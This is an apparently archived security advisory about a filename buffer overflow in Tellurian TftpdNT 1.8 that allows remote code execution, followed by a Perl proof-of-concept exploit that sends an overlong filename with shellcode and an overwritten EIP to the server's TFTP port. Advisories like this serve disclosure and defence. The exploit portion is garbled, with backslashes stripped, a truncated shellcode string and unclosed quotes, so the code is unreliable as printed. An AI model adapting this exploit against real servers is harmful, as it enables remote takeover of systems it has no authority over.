‘Security Vulnerability in Tellurian TftpdNT (Long Filename) ‘


Tellurian TftpdNT is a TFTP server for Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to cause the product to overflow an internal buffer, while executing arbitrary code. ‘


‘SecurITeam would like to thank STORM for finding this vulnerability.’


Vulnerable systems:
 * TftpdNT version 1.8

Immune systems:
 * TftpdNT version 2.0

It is possible to cause a buffer overflow in the Tellurian TftpdNT product, while overwriting the EIP pointer – this allows remote command execution.
The overflow occurs in the product’s parsing of the filename.

Vendor status:
The vendor has been informed, and has fixed the issue within 24 hours. A new version is available on the web site.

#!/usr/bin/perl -w
#Tellurian TFTP Server buffer overflow vulnerability

use IO::Socket;
$host = ‘’;
$port = ’69’;

$shellcode = ‘x90xCCx90x90x90x90x8BxECx55x8BxECx33

$buf = ‘x00x02’;
$buf .= ‘x41’x(508-length($shellcode));
$buf .= $shellcode;
$buf .= ‘x0Fx02xC7’; # EIP
$buf .= ‘x00x6Ex65x74x61x73x63x69x69x00’;

print ‘Length: ‘, length($buf), ‘n’;

$socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error:
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die ‘Can’t send: $!n’;
print ‘Donen’; ‘

Categories: Windows